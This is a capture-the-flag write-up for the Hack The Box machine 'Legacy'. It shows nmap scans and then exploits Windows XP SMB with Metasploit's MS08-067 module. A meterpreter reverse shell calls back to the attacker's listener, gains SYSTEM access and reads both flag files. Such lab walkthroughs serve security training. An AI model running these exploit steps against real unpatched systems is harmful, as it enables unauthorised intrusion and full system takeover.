Introduction
Legacy is a relatively easy box which has SMB running on Windows XP(2000) OS.
We find the exploit with metasploit and get access to priviledged user NT AUTHORITY\SYSTEM directly.
Scanning and Information Gathering
Nmap Scan
nmap -p- -T4 -min-rate=1000 -oN 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun 3 15:40:41 2022 as: nmap -p- -T4 -min-rate=1000 -oN ports.out 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
# Nmap done at Fri Jun 3 15:42:09 2022 -- 1 IP address (1 host up) scanned in 87.81 seconds
nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun 3 15:43:24 2022 as: nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:dc:06 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-06-08T20:41:24+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 3 15:44:35 2022 -- 1 IP address (1 host up) scanned in 71.43 seconds
Exploiting
We will be using
139,445 - Pentesting SMB from hacktricks1
Using msf2 we search for an exploit for: SMB, windows 2000
Using exploit/windows/smb/ms08_067_netapi as it mentions Rank: great and Check: Yes.
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.139 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.14.139:4444
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.129.227.181
[*] Meterpreter session 3 opened (10.10.14.139:4444 -> 10.129.227.181:1036) at 2022-06-03 16:19:32 +0000
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We have 2 users
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-03-16 06:07:21 +0000 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 05:29:48 +0000 All Users
040777/rwxrwxrwx 0 dir 2017-03-16 05:33:37 +0000 Default User
040777/rwxrwxrwx 0 dir 2017-03-16 05:32:52 +0000 LocalService
040777/rwxrwxrwx 0 dir 2017-03-16 05:32:43 +0000 NetworkService
040777/rwxrwxrwx 0 dir 2017-03-16 05:33:42 +0000 john
We get user flag at C:\Documents and Settings\john\Desktop
meterpreter > pwd
C:\Documents and Settings\john\Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 06:19:49 +0000 user.txt
meterpreter > cat user.txt
e69a███████████████████████7644f
And Administrator flag at C:\Documents and Settings\Administrator\Desktop
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 06:18:50 +0000 root.txt
meterpreter > cat root.txt
9934███████████████████████d5713
